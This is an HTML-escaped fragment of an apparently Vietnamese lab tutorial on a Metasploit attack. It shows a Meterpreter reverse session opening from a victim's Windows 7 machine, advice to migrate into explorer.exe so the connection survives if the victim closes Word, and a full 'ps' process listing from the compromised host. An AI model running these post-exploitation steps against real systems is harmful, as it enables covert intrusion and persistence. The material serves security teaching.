[<\/span>*<\/span>]<\/span> Meterpreter <\/span>session<\/span> 1<\/span> opened<\/span> (<\/span>10.0.0.131<\/span>:<\/span>443<\/span> -><\/span> 10.0.0.4<\/span>:<\/span>49207<\/span>)<\/span> at<\/span> 2014<\/span>–<\/span>09<\/span>–<\/span>06<\/span> 03<\/span>:<\/span>07<\/span>:<\/span>12<\/span> –<\/span>0400<\/span><\/div>\n
<\/div>\n
msf <\/span>exploit<\/span>(<\/span>handler<\/span>)<\/span> ><\/span><\/div>\n
<\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n

K\u1ebft n\u1ed1i v\u00e0o session meterpreter<\/strong> . Migrate<\/strong> sang process explorer.exe<\/strong> tr\u00e1nh tr\u01b0\u1eddng h\u1ee3p victim t\u1eaft Word th\u00ec m\u1ea5t k\u1ebft n\u1ed1i.<\/p>\n

\n
<\/div>\n
<\/div>\n
\n\n\n\n
\n
\n
1<\/div>\n
2<\/div>\n
3<\/div>\n
4<\/div>\n
5<\/div>\n
6<\/div>\n
7<\/div>\n
8<\/div>\n
9<\/div>\n
10<\/div>\n
11<\/div>\n
12<\/div>\n
13<\/div>\n
14<\/div>\n
15<\/div>\n
16<\/div>\n
17<\/div>\n
18<\/div>\n
19<\/div>\n
20<\/div>\n
21<\/div>\n
22<\/div>\n
23<\/div>\n
24<\/div>\n
25<\/div>\n
26<\/div>\n
27<\/div>\n
28<\/div>\n
29<\/div>\n
30<\/div>\n
31<\/div>\n
32<\/div>\n
33<\/div>\n
34<\/div>\n
35<\/div>\n
36<\/div>\n
37<\/div>\n
38<\/div>\n
39<\/div>\n
40<\/div>\n
41<\/div>\n
42<\/div>\n
43<\/div>\n
44<\/div>\n
45<\/div>\n
46<\/div>\n
47<\/div>\n
48<\/div>\n
49<\/div>\n
50<\/div>\n
51<\/div>\n
52<\/div>\n
53<\/div>\n
54<\/div>\n
55<\/div>\n
56<\/div>\n
57<\/div>\n
58<\/div>\n
59<\/div>\n<\/div>\n<\/td>\n
\n
\n
msf <\/span>exploit<\/span>(<\/span>handler<\/span>)<\/span> ><\/span> sessions<\/span> –<\/span>i<\/span> 1<\/span><\/div>\n
[<\/span>*<\/span>]<\/span> Starting <\/span>interaction <\/span>with<\/span> 1…<\/span><\/div>\n
<\/div>\n
meterpreter<\/span> ><\/span> ps<\/span><\/div>\n
<\/div>\n
Process <\/span>List<\/span><\/div>\n
===<\/span>===<\/span>===<\/span>===<\/span><\/div>\n
<\/div>\n
PID\u00a0\u00a0 <\/span>PPID\u00a0\u00a0<\/span>Name\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>Arch\u00a0\u00a0<\/span>Session\u00a0\u00a0\u00a0\u00a0 <\/span>User\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>Path<\/span><\/div>\n
—<\/span>–<\/span>\u00a0\u00a0 <\/span>—<\/span>—<\/span>\u00a0\u00a0<\/span>—<\/span>—<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>—<\/span>—<\/span>\u00a0\u00a0<\/span>—<\/span>—<\/span>—<\/span>–<\/span>\u00a0\u00a0\u00a0\u00a0 <\/span>—<\/span>—<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>—<\/span>—<\/span><\/div>\n
0<\/span>\u00a0\u00a0\u00a0\u00a0 <\/span>0<\/span>\u00a0\u00a0\u00a0\u00a0 <\/span>[<\/span>System <\/span>Process<\/span>]<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>4294967295<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><\/div>\n
4<\/span>\u00a0\u00a0\u00a0\u00a0 <\/span>0<\/span>\u00a0\u00a0\u00a0\u00a0 <\/span>System\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>x86<\/span>\u00a0\u00a0 <\/span>0<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><\/div>\n
256<\/span>\u00a0\u00a0 <\/span>4<\/span>\u00a0\u00a0\u00a0\u00a0 <\/span>smss<\/span>.<\/span>exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>x86<\/span>\u00a0\u00a0 <\/span>0<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>NT <\/span>AUTHORITY<\/span>\\<\/span>SYSTEM<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>\\<\/span>SystemRoot<\/span>\\<\/span>System32<\/span>\\<\/span>smss<\/span>.<\/span>exe<\/span><\/div>\n
352<\/span>\u00a0\u00a0 <\/span>328<\/span>\u00a0\u00a0 <\/span>csrss<\/span>.<\/span>exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>x86<\/span>\u00a0\u00a0 <\/span>0<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>NT <\/span>AUTHORITY<\/span>\\<\/span>SYSTEM<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>C<\/span>:<\/span>\\<\/span>Windows<\/span>\\<\/span>system32<\/span>\\<\/span>csrss<\/span>.<\/span>exe<\/span><\/div>\n
364<\/span>\u00a0\u00a0 <\/span>512<\/span>\u00a0\u00a0 <\/span>msdtc<\/span>.<\/span>exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>x86<\/span>\u00a0\u00a0 <\/span>0<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>NT <\/span>AUTHORITY<\/span>\\<\/span>NETWORK <\/span>SERVICE<\/span>\u00a0\u00a0<\/span>C<\/span>:<\/span>\\<\/span>Windows<\/span>\\<\/span>System32<\/span>\\<\/span>msdtc<\/span>.<\/span>exe<\/span><\/div>\n
408<\/span>\u00a0\u00a0 <\/span>328<\/span>\u00a0\u00a0 <\/span>wininit<\/span>.<\/span>exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>x86<\/span>\u00a0\u00a0 <\/span>0<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>NT <\/span>AUTHORITY<\/span>\\<\/span>SYSTEM<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>C<\/span>:<\/span>\\<\/span>Windows<\/span>\\<\/span>system32<\/span>\\<\/span>wininit<\/span>.<\/span>exe<\/span><\/div>\n
416<\/span>\u00a0\u00a0 <\/span>400<\/span>\u00a0\u00a0 <\/span>csrss<\/span>.<\/span>exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>x86<\/span>\u00a0\u00a0 <\/span>1<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>NT <\/span>AUTHORITY<\/span>\\<\/span>SYSTEM<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>C<\/span>:<\/span>\\<\/span>Windows<\/span>\\<\/span>system32<\/span>\\<\/span>csrss<\/span>.<\/span>exe<\/span><\/div>\n
452<\/span>\u00a0\u00a0 <\/span>400<\/span>\u00a0\u00a0 <\/span>winlogon<\/span>.<\/span>exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>x86<\/span>\u00a0\u00a0 <\/span>1<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>NT <\/span>AUTHORITY<\/span>\\<\/span>SYSTEM<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>C<\/span>:<\/span>\\<\/span>Windows<\/span>\\<\/span>system32<\/span>\\<\/span>winlogon<\/span>.<\/span>exe<\/span><\/div>\n
512<\/span>\u00a0\u00a0 <\/span>408<\/span>\u00a0\u00a0 <\/span>services<\/span>.<\/span>exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>x86<\/span>\u00a0\u00a0 <\/span>0<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>NT <\/span>AUTHORITY<\/span>\\<\/span>SYSTEM<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>C<\/span>:<\/span>\\<\/span>Windows<\/span>\\<\/span>system32<\/span>\\<\/span>services<\/span>.<\/span>exe<\/span><\/div>\n
520<\/span>\u00a0\u00a0 <\/span>408<\/span>\u00a0\u00a0 <\/span>lsass<\/span>.<\/span>exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>x86<\/span>\u00a0\u00a0 <\/span>0<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>NT <\/span>AUTHORITY<\/span>\\<\/span>SYSTEM<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>C<\/span>:<\/span>\\<\/span>Windows<\/span>\\<\/span>system32<\/span>\\<\/span>lsass<\/span>.<\/span>exe<\/span><\/div>\n
528<\/span>\u00a0\u00a0 <\/span>408<\/span>\u00a0\u00a0 <\/span>lsm<\/span>.<\/span>exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>x86<\/span>\u00a0\u00a0 <\/span>0<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>NT <\/span>AUTHORITY<\/span>\\<\/span>SYSTEM<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>C<\/span>:<\/span>\\<\/span>Windows<\/span>\\<\/span>system32<\/span>\\<\/span>lsm<\/span>.<\/span>exe<\/span><\/div>\n
628<\/span>\u00a0\u00a0 <\/span>512<\/span>\u00a0\u00a0 <\/span>svchost<\/span>.<\/span>exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>x86<\/span>\u00a0\u00a0 <\/span>0<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>NT <\/span>AUTHORITY<\/span>\\<\/span>SYSTEM<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>C<\/span>:<\/span>\\<\/span>Windows<\/span>\\<\/span>system32<\/span>\\<\/span>svchost<\/span>.<\/span>exe<\/span><\/div>\n
700<\/span>\u00a0\u00a0 <\/span>512<\/span>\u00a0\u00a0 <\/span>svchost<\/span>.<\/span>exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>x86<\/span>\u00a0\u00a0 <\/span>0<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>NT <\/span>AUTHORITY<\/span>\\<\/span>NETWORK <\/span>SERVICE<\/span>\u00a0\u00a0<\/span>C<\/span>:<\/span>\\<\/span>Windows<\/span>\\<\/span>system32<\/span>\\<\/span>svchost<\/span>.<\/span>exe<\/span><\/div>\n
788<\/span>\u00a0\u00a0 <\/span>512<\/span>\u00a0\u00a0 <\/span>svchost<\/span>.<\/span>exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>x86<\/span>\u00a0\u00a0 <\/span>0<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>NT <\/span>AUTHORITY<\/span>\\<\/span>LOCAL <\/span>SERVICE<\/span>\u00a0\u00a0\u00a0\u00a0<\/span>C<\/span>:<\/span>\\<\/span>Windows<\/span>\\<\/span>System32<\/span>\\<\/span>svchost<\/span>.<\/span>exe<\/span><\/div>\n
844<\/span>\u00a0\u00a0 <\/span>512<\/span>\u00a0\u00a0 <\/span>svchost<\/span>.<\/span>exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>x86<\/span>\u00a0\u00a0 <\/span>0<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>NT <\/span>AUTHORITY<\/span>\\<\/span>SYSTEM<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>C<\/span>:<\/span>\\<\/span>Windows<\/span>\\<\/span>System32<\/span>\\<\/span>svchost<\/span>.<\/span>exe<\/span><\/div>\n
872<\/span>\u00a0\u00a0 <\/span>512<\/span>\u00a0\u00a0 <\/span>svchost<\/span>.<\/span>exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>x86<\/span>\u00a0\u00a0 <\/span>0<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>NT <\/span>AUTHORITY<\/span>\\<\/span>SYSTEM<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>C<\/span>:<\/span>\\<\/span>Windows<\/span>\\<\/span>system32<\/span>\\<\/span>svchost<\/span>.<\/span>exe<\/span><\/div>\n
1044<\/span>\u00a0\u00a0<\/span>512<\/span>\u00a0\u00a0 <\/span>svchost<\/span>.<\/span>exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>x86<\/span>\u00a0\u00a0 <\/span>0<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>NT <\/span>AUTHORITY<\/span>\\<\/span>LOCAL <\/span>SERVICE<\/span>\u00a0\u00a0\u00a0\u00a0<\/span>C<\/span>:<\/span>\\<\/span>Windows<\/span>\\<\/span>system32<\/span>\\<\/span>svchost<\/span>.<\/span>exe<\/span><\/div>\n
1156<\/span>\u00a0\u00a0<\/span>512<\/span>\u00a0\u00a0 <\/span>svchost<\/span>.<\/span>exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>x86<\/span>\u00a0\u00a0 <\/span>0<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>NT <\/span>AUTHORITY<\/span>\\<\/span>NETWORK <\/span>SERVICE<\/span>\u00a0\u00a0<\/span>C<\/span>:<\/span>\\<\/span>Windows<\/span>\\<\/span>system32<\/span>\\<\/span>svchost<\/span>.<\/span>exe<\/span><\/div>\n
1296<\/span>\u00a0\u00a0<\/span>512<\/span>\u00a0\u00a0 <\/span>spoolsv<\/span>.<\/span>exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>x86<\/span>\u00a0\u00a0 <\/span>0<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>NT <\/span>AUTHORITY<\/span>\\<\/span>SYSTEM<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>C<\/span>:<\/span>\\<\/span>Windows<\/span>\\<\/span>System32<\/span>\\<\/span>spoolsv<\/span>.<\/span>exe<\/span><\/div>\n
1324<\/span>\u00a0\u00a0<\/span>512<\/span>\u00a0\u00a0 <\/span>svchost<\/span>.<\/span>exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>x86<\/span>\u00a0\u00a0 <\/span>0<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>NT <\/span>AUTHORITY<\/span>\\<\/span>LOCAL <\/span>SERVICE<\/span>\u00a0\u00a0\u00a0\u00a0<\/span>C<\/span>:<\/span>\\<\/span>Windows<\/span>\\<\/span>system32<\/span>\\<\/span>svchost<\/span>.<\/span>exe<\/span><\/div>\n
1360<\/span>\u00a0\u00a0<\/span>4016<\/span>\u00a0\u00a0<\/span>chrome<\/span>.<\/span>exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>x86<\/span>\u00a0\u00a0 <\/span>1<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>CL01<\/span>–<\/span>W7<\/span>\\<\/span>user1<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>C<\/span>:<\/span>\\<\/span>Program <\/span>Files<\/span>\\<\/span>Google<\/span>\\<\/span>Chrome<\/span>\\<\/span>Application<\/span>\\<\/span>chrome<\/span>.<\/span>exe<\/span><\/div>\n
1428<\/span>\u00a0\u00a0<\/span>512<\/span>\u00a0\u00a0 <\/span>svchost<\/span>.<\/span>exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>x86<\/span>\u00a0\u00a0 <\/span>0<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>NT <\/span>AUTHORITY<\/span>\\<\/span>LOCAL <\/span>SERVICE<\/span>\u00a0\u00a0\u00a0\u00a0<\/span>C<\/span>:<\/span>\\<\/span>Windows<\/span>\\<\/span>system32<\/span>\\<\/span>svchost<\/span>.<\/span>exe<\/span><\/div>\n
1476<\/span>\u00a0\u00a0<\/span>512<\/span>\u00a0\u00a0 <\/span>vmtoolsd<\/span>.<\/span>exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>x86<\/span>\u00a0\u00a0 <\/span>0<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>NT <\/span>AUTHORITY<\/span>\\<\/span>SYSTEM<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>C<\/span>:<\/span>\\<\/span>Program <\/span>Files<\/span>\\<\/span>VMware<\/span>\\<\/span>VMware <\/span>Tools<\/span>\\<\/span>vmtoolsd<\/span>.<\/span>exe<\/span><\/div>\n
1552<\/span>\u00a0\u00a0<\/span>4016<\/span>\u00a0\u00a0<\/span>WINWORD<\/span>.<\/span>EXE\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>x86<\/span>\u00a0\u00a0 <\/span>1<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>CL01<\/span>–<\/span>W7<\/span>\\<\/span>user1<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>C<\/span>:<\/span>\\<\/span>Program <\/span>Files<\/span>\\<\/span>Microsoft <\/span>Office<\/span>\\<\/span>Office12<\/span>\\<\/span>WINWORD<\/span>.<\/span>EXE<\/span><\/div>\n
1692<\/span>\u00a0\u00a0<\/span>512<\/span>\u00a0\u00a0 <\/span>TPAutoConnSvc<\/span>.<\/span>exe\u00a0\u00a0<\/span>x86<\/span>\u00a0\u00a0 <\/span>0<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>NT <\/span>AUTHORITY<\/span>\\<\/span>SYSTEM<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>C<\/span>:<\/span>\\<\/span>Program <\/span>Files<\/span>\\<\/span>VMware<\/span>\\<\/span>VMware <\/span>Tools<\/span>\\<\/span>TPAutoConnSvc<\/span>.<\/span>exe<\/span><\/div>\n
1780<\/span>\u00a0\u00a0<\/span>512<\/span>\u00a0\u00a0 <\/span>svchost<\/span>.<\/span>exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>x86<\/span>\u00a0\u00a0 <\/span>0<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>NT <\/span>AUTHORITY<\/span>\\<\/span>LOCAL <\/span>SERVICE<\/span>\u00a0\u00a0\u00a0\u00a0<\/span>C<\/span>:<\/span>\\<\/span>Windows<\/span>\\<\/span>system32<\/span>\\<\/span>svchost<\/span>.<\/span>exe<\/span><\/div>\n
1996<\/span>\u00a0\u00a0<\/span>512<\/span>\u00a0\u00a0 <\/span>dllhost<\/span>.<\/span>exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>x86<\/span>\u00a0\u00a0 <\/span>0<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>NT <\/span>AUTHORITY<\/span>\\<\/span>SYSTEM<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>C<\/span>:<\/span>\\<\/span>Windows<\/span>\\<\/span>system32<\/span>\\<\/span>dllhost<\/span>.<\/span>exe<\/span><\/div>\n
2052<\/span>\u00a0\u00a0<\/span>872<\/span>\u00a0\u00a0 <\/span>taskeng<\/span>.<\/span>exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>x86<\/span>\u00a0\u00a0 <\/span>0<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>NT <\/span>AUTHORITY<\/span>\\<\/span>SYSTEM<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>C<\/span>:<\/span>\\<\/span>Windows<\/span>\\<\/span>system32<\/span>\\<\/span>taskeng<\/span>.<\/span>exe<\/span><\/div>\n
2064<\/span>\u00a0\u00a0<\/span>844<\/span>\u00a0\u00a0 <\/span>dwm<\/span>.<\/span>exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>x86<\/span>\u00a0\u00a0 <\/span>1<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>CL01<\/span>–<\/span>W7<\/span>\\<\/span>user1<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>C<\/span>:<\/span>\\<\/span>Windows<\/span>\\<\/span>system32<\/span>\\<\/span>Dwm<\/span>.<\/span>exe<\/span><\/div>\n
2104<\/span>\u00a0\u00a0<\/span>1956<\/span>\u00a0\u00a0<\/span>explorer<\/span>.<\/span>exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>x86<\/span>\u00a0\u00a0 <\/span>1<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>CL01<\/span>–<\/span>W7<\/span>\\<\/span>user1<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>C<\/span>:<\/span>\\<\/span>Windows<\/span>\\<\/span>Explorer<\/span>.<\/span>EXE<\/span><\/div>\n
2112<\/span>\u00a0\u00a0<\/span>512<\/span>\u00a0\u00a0 <\/span>taskhost<\/span>.<\/span>exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>x86<\/span>\u00a0\u00a0 <\/span>1<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>CL01<\/span>–<\/span>W7<\/span>\\<\/span>user1<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>C<\/span>:<\/span>\\<\/span>Windows<\/span>\\<\/span>system32<\/span>\\<\/span>taskhost<\/span>.<\/span>exe<\/span><\/div>\n
2332<\/span>\u00a0\u00a0<\/span>2052<\/span>\u00a0\u00a0<\/span>GoogleUpdate<\/span>.<\/span>exe\u00a0\u00a0 <\/span>x86<\/span>\u00a0\u00a0 <\/span>0<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>NT <\/span>AUTHORITY<\/span>\\<\/span>SYSTEM<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>C<\/span>:<\/span>\\<\/span>Program <\/span>Files<\/span>\\<\/span>Google<\/span>\\<\/span>Update<\/span>\\<\/span>GoogleUpdate<\/span>.<\/span>exe<\/span><\/div>\n
2352<\/span>\u00a0\u00a0<\/span>1692<\/span>\u00a0\u00a0<\/span>TPAutoConnect<\/span>.<\/span>exe\u00a0\u00a0<\/span>x86<\/span>\u00a0\u00a0 <\/span>1<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>CL01<\/span>–<\/span>W7<\/span>\\<\/span>user1<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>C<\/span>:<\/span>\\<\/span>Program <\/span>Files<\/span>\\<\/span>VMware<\/span>\\<\/span>VMware <\/span>Tools<\/span>\\<\/span>TPAutoConnect<\/span>.<\/span>exe<\/span><\/div>\n
2360<\/span>\u00a0\u00a0<\/span>416<\/span>\u00a0\u00a0 <\/span>conhost<\/span>.<\/span>exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>x86<\/span>\u00a0\u00a0 <\/span>1<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>CL01<\/span>–<\/span>W7<\/span>\\<\/span>user1<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>C<\/span>:<\/span>\\<\/span>Windows<\/span>\\<\/span>system32<\/span>\\<\/span>conhost<\/span>.<\/span>exe<\/span><\/div>\n
2428<\/span>\u00a0\u00a0<\/span>2104<\/span>\u00a0\u00a0<\/span>vmtoolsd<\/span>.<\/span>exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>x86<\/span>\u00a0\u00a0 <\/span>1<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>CL01<\/span>–<\/span>W7<\/span>\\<\/span>user1<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>C<\/span>:<\/span>\\<\/span>Program <\/span>Files<\/span>\\<\/span>VMware<\/span>\\<\/span>VMware <\/span>Tools<\/span>\\<\/span>vmtoolsd<\/span>.<\/span>exe<\/span><\/div>\n
